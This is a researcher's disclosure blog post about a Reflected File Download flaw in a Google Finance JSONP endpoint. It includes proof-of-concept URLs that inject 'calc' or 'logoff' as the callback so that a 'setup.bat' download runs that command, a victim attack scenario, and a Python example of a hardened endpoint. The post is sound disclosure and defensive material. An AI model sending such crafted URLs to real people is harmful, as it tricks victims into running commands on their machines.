Found this vulnerability when auditing another client. With this RFD you don't need to create a page to force the download:
the request for this Google JSON file already does it for us.

When I noticed this request:

[code lang="html"]http://www.google.com/finance/info?q=ELI:ALTR&callback=?[/code]

Which returned the following information:

[code lang="html"]
// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
[/code]

I wondered if that callback parameter could be manipulated. So I injected "calc" in the request:

[code lang="html"]http://www.google.com/finance/info?q=ELI:ALTR&callback=calc[/code]

Which returned the following information:

[code lang="html"]
//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);
[/code]

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:

[code lang="html"]http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc[/code]

Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.

I tried successfully with the following browsers:

  • Firefox latest version
  • Opera latest version
  • Internet Explorer 8 and 9

What are the limitations?

I noticed in my testing that most characters are sanitized, so the callback only allows a single command with no spaces or arguments.

Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logs off the authenticated user]

Possible attack scenario:

  1. Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
  2. Victim downloads the file and executes it.
  3. After execution of the batch file the victim is logged off from the operating system.
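As an added example (not code from this post or from Google), here is the server-side shape of a JSONP endpoint hardened against the three ingredients of the scenario above: the path-info suffix that names the download, the reflected callback, and the missing Content-Disposition header. The endpoint path, the `QUOTE` record and the `handle_info` function are constructed for illustration.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample quote, shaped like the Google Finance record in the post.
QUOTE = [{"id": "703655", "t": "ALTR", "e": "ELI", "l": "4.71"}]

# A JSONP callback must look like a JavaScript identifier (dotted names
# such as "jQuery.cb" included); anything else is rejected, not reflected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")

# Hypothetical endpoint path; constructed for this example.
INFO_PATH = "/finance/info"


def handle_info(url):
    """Return (status, headers, body) for a GET of the quote endpoint."""
    parts = urlsplit(url)
    # urlsplit keeps ";setup.bat" in the path, so a path-info suffix is
    # visible here. Reject it: browsers derive the download filename from
    # the last path segment, which is what turns the response into a .bat.
    if parts.path != INFO_PATH:
        return 404, {"Content-Type": "text/plain"}, "not found"

    callback = parse_qs(parts.query).get("callback", [""])[0]
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        # A fixed filename with a harmless extension: even if the browser
        # is forced to download, the URL cannot choose the name or extension.
        "Content-Disposition": 'attachment; filename="info.json"',
        "X-Content-Type-Options": "nosniff",
    }
    payload = json.dumps(QUOTE)
    if not callback:
        return 200, headers, payload
    if not CALLBACK_RE.match(callback):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, f"/**/{callback}({payload});"
```

Note that "calc" and "logoff" are valid identifiers, so the callback whitelist alone does not stop this class of bug; the fixed filename and the path check are what remove the download-as-batch-file path.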

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don't agree, but that's my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.
